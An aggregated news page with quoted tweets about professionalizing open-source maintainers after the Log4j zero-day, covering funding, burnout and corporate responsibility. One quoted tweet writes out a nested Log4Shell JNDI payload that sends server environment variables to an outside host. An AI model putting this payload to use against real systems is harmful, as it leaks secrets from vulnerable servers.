How the role of open-source maintainers could be professionalized, as the maintainer who fixed the log4j zero-day says he works on the project in his spare time
Open Source software runs the Internet, and by extension the economy. This is an undisputed fact about reality in 2021.
Filippo.ioFilippo Valsorda
Context & Ripple Effects
The professionalization debate follows a long-running mismatch between the importance of widely used open-source projects and the resources available to their caretakers. Earlier coverage documented maintainer burnout around projects such as OpenSSL and found that most prominent Open Collective projects earned below industry-standard or poverty-level income despite their broad use.
The Log4j response turns that funding debate into a security-responsibility issue: a maintainer handling a zero-day says the work is done in spare time. A 2021 maintainer survey likewise found that many maintainers were unpaid and that paid work was often minimal among those receiving compensation.
First-order effects
Professionalization proposals put the gap between critical incident response and volunteer availability at the center of the maintainer role.
Volunteer maintainers of security-critical projects face greater pressure to secure dedicated, compensated time for maintenance and emergency fixes.
Second-order effects
Organizations that rely on foundational open-source components have a stronger incentive to fund maintenance directly or through shared funding mechanisms rather than treat it as an external volunteer service.
Commercial approaches such as more restrictive licenses gain relevance as projects seek durable revenue, extending an earlier debate over monetizing open-source software.
Third-order effects
If professional maintenance becomes a norm for critical projects, open distribution is likely to be paired more often with explicit funding and accountability arrangements rather than an assumption of unpaid stewardship.
The security burden may increasingly distinguish infrastructure dependencies that require sustained institutional backing from projects that can remain primarily volunteer-led.
The trend: Open source is moving toward explicit funding and accountability for critical dependencies as volunteer maintenance becomes recognized as a security constraint.
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. htt…
This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage. “I work on Log4j in my spare time” “always dreamed of working on open source full time” “3 sponsors are funding @rgoers's work: Michael, Glenn, Matt” People, what are we doing. h…
No one is paying the log4j2 maintainers!? There is a whole page on the responsibilities of a @TheASF “Project Management Committee”... AND NO ONE IS PAYING THEM? https://www.apache.org/... Open Source needs to grow the hell up. Yesterday. https://twitter.com/...
This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.
The Apache Log4j project is maintained by three people who are volunteering their spare time. Please don't be a jerk to them because multi-billion dollar companies are using their tool without even bothering to throw $1,000 their way. https://twitter.com/...
In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:user}.xyz.collab.co m/ a} Will leak server side env vars!
Player safety is the top priority for us. Unfortunately, earlier today we identified a security vulnerability in Minecraft: Java Edition. The issue is patched, but please follow these steps to secure your game client and/or servers. Please RT to amplify. https://www.minecraft.net…
As a follow-up: @FiloSottile has a nice post about professionalizing the role of OSS maintainer. This is great! But I would still argue that money is finite, and knowing which projects need help is a basic missing ingredient. https://blog.filippo.io/...
hearing folks compare #log4shell is “as bad as heartbleed” - imo it's much, much worse. aside from having RCE as the impact, the number of interdependencies around log4j (and particularly the age of them) is orders of magnitude higher
Endorse all this. There are a ton of engineers, of all experience levels, who would jump at the chance to do this kind of work if they could make a stable career out of it. https://twitter.com/... https://twitter.com/...
We all agree the status quo is unsustainable. Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession. The thing is, companies need it as much as maintainers do. https://blog.filippo.io/...
Great post — charity-based open source is very naive and unrealistic, if only because its 100x more complicated for a business to pay someone for nothing than it is for something. https://blog.filippo.io/... https://twitter.com/...
This is well-intentioned but saying “companies are in the business of getting what they need—by paying invoices” show incredible naivety in how bad companies are at paying their invoices https://blog.filippo.io/...
This! I am thankful to all GitHub Sponsors and Patreons, but without my day2day job @ISCdotORG (which is thankfully also working on Open Source), I would be able to sustain my family. https://twitter.com/...